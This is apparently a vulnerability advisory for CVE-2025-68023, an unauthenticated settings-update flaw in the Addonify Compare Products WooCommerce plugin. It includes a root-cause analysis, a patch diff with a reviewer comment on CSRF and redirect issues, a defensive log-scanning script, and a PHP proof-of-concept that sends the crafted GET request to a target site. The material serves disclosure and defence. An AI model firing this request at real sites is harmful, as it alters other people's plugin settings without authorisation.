Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68023: Addonify – Compare Products For WooCommerce <= 1.1.17 – Missing Authorization to Unauthenticated Settings Update (addonify-compare-products)

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 1.1.17
Patched Version 1.1.18
Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68023:
The Addonify – Compare Products for WooCommerce plugin, up to version 1.1.17, contains a Missing Authorization vulnerability. This flaw allows unauthenticated attackers to modify plugin settings, directly impacting the plugin’s configuration and functionality.

Atomic Edge research identifies the root cause in the `process_user_tracking_choice` function within the file `/includes/udp/class-udp-agent.php`. The function handles a user tracking preference request via the `udp-agent-allow-access` GET parameter. Prior to version 1.1.18, the function performed no capability or authentication checks. Any HTTP request triggering this function could execute its logic, which updates plugin settings based on user input.

The exploitation vector is a direct HTTP GET request to the site’s homepage or any page where the plugin’s UDP agent logic is active. An attacker sends a request with the `udp-agent-allow-access` parameter set to either `yes` or `no`. For example, a request to `https://target.com/?udp-agent-allow-access=yes` would be processed by the vulnerable function, altering the plugin’s user tracking consent setting without requiring any authentication.

The patch in version 1.1.18 adds an authorization check at the beginning of the `process_user_tracking_choice` function. The fix verifies the user is both logged in (`is_user_logged_in()`) and possesses the `manage_options` capability (`current_user_can('manage_options')`). If either check fails, the user is redirected to the homepage and the function execution halts. This change restricts endpoint access to administrators only, remediating the missing authorization flaw.

Successful exploitation allows an unauthenticated attacker to change plugin settings. The specific function controls user tracking preferences. An attacker could disable tracking or manipulate other related configuration values the function updates. This could disrupt expected plugin behavior, affect site analytics, or serve as a stepping stone in a broader attack chain by altering the plugin’s operational state.
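Added example for defenders (not part of the Atomic Edge advisory or the plugin's code): a small Python triage helper that flags requests carrying the `udp-agent-allow-access` parameter in combined-format access logs and checks a plugin header's `Version:` line against the patched release. The log lines are constructed samples; the field names of the returned records are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/Nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2026:10:01:02 +0000] "GET /?udp-agent-allow-access=yes HTTP/1.1" 200 5120 "-" "curl/8.5.0"
198.51.100.4 - - [18/Mar/2026:10:01:05 +0000] "GET /shop/ HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Mar/2026:10:01:09 +0000] "GET /product/a?udp-agent-allow-access=no HTTP/1.1" 302 0 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PARAM = "udp-agent-allow-access"          # the GET parameter handled by process_user_tracking_choice()
VERSION_RE = re.compile(r'^\s*\*\s*Version:\s*([\d.]+)', re.M)
PATCHED = (1, 1, 18)                      # first release with the capability check


def find_tracking_choice_requests(log_text):
    """Return one record per request that carries the udp-agent-allow-access parameter.

    Every hit is worth a look: on <= 1.1.17 the setting was written for any
    requester; on 1.1.18 a non-admin requester is redirected to home_url().
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not combined-format requests
        url = urlsplit(m.group("target"))
        qs = parse_qs(url.query)
        if PARAM not in qs:
            continue
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "path": url.path,
            "choice": qs[PARAM][0],       # 'yes' or 'no' as sent by the requester
            "status": int(m.group("status")),
        })
    return hits


def plugin_is_vulnerable(plugin_header):
    """True when the plugin's main-file header reports a version below 1.1.18."""
    m = VERSION_RE.search(plugin_header)
    if not m:
        raise ValueError("no Version: line in plugin header")
    return tuple(int(p) for p in m.group(1).split(".")) < PATCHED


if __name__ == "__main__":
    for hit in find_tracking_choice_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} set choice={hit['choice']} on {hit['path']} -> HTTP {hit['status']}")
```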

Differential between vulnerable and patched code

Code Diff
--- a/addonify-compare-products/addonify-compare-products.php
+++ b/addonify-compare-products/addonify-compare-products.php
@@ -10,8 +10,8 @@
  * Plugin Name:       Addonify - Compare Products For WooCommerce
  * Plugin URI:        https://wordpress.org/plugins/addonify-compare-products/
  * Description:       Addonify Compare Products is a WooCommerce extension that allows website visitors to compare multiple products on your online store.
- * Version:           1.1.17
- * Tested up to:      6.8
+ * Version:           1.1.18
+ * Tested up to:      6.9.1
  * Requires at least: 6.3
  * Requires PHP:      7.4
  * Author:            Addonify
@@ -28,7 +28,7 @@
 	die;
 }

-define( 'ADDONIFY_COMPARE_PRODUCTS_VERSION', '1.1.17' );
+define( 'ADDONIFY_COMPARE_PRODUCTS_VERSION', '1.1.18' );
 define( 'ADDONIFY_COMPARE_PRODUCTS_BASENAME', plugin_basename( __FILE__ ) );
 define( 'ADDONIFY_CP_DB_INITIALS', 'addonify_cp_' );
 define( 'ADDONIFY_CP_PLUGIN_PATH', dirname( __FILE__ ) );
--- a/addonify-compare-products/includes/udp/class-udp-agent.php
+++ b/addonify-compare-products/includes/udp/class-udp-agent.php
@@ -172,6 +172,11 @@
 	 * @since    1.0.0
 	 */
 	private function process_user_tracking_choice() {
+		// Verify if the user is logged in and has the capability to manage options.
+		if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
+			wp_safe_redirect( home_url() );
+			exit;
+		}

 		$users_choice = isset( $_GET['udp-agent-allow-access'] ) ? sanitize_text_field( wp_unslash( $_GET['udp-agent-allow-access'] ) ) : ''; //phpcs:ignore
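Review bot: the new guard runs before the function checks whether `udp-agent-allow-access` is present at all (the `isset( $_GET['udp-agent-allow-access'] )` test only comes afterwards), so if the caller reaches `process_user_tracking_choice()` on ordinary page loads, every logged-out visitor is redirected to `home_url()` and the request ends; either confirm the caller only invokes this function when the parameter is set, or move the `isset` test above the capability check. `is_user_logged_in()` is redundant next to `current_user_can( 'manage_options' )`, which already returns false for anonymous users, though it is harmless. The request also remains a plain GET with no nonce (the trailing `//phpcs:ignore` on the `$_GET` line suppresses exactly that warning), so an administrator who follows a crafted link still changes the setting; a `wp_verify_nonce()` check on the request would close that CSRF path.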

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68023 - Addonify – Compare Products For WooCommerce <= 1.1.17 - Missing Authorization to Unauthenticated Settings Update

$target_url = 'https://example.com/';

// The vulnerable parameter
$parameter = 'udp-agent-allow-access';
// Payload to set the user tracking choice. Expected values are 'yes' or 'no'.
$payload = 'yes';

// Construct the exploit URL
$exploit_url = $target_url . '?' . $parameter . '=' . urlencode($payload);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Follow redirects to see the final response
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for cURL errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "\n";
} else {
    echo "Request sent to: $exploit_url\n";
    echo "HTTP Response Code: $http_code\n";
    // A successful exploitation attempt may result in a 200 OK or a redirect.
    // The vulnerability is a logic flaw, so a non-error response often indicates the request was processed.
    if ($http_code >= 200 && $http_code < 300) {
        echo "Potential exploitation successful. Plugin settings may have been altered.\n";
    } else {
        echo "Request may have been blocked or failed.\n";
    }
}

curl_close($ch);

?>
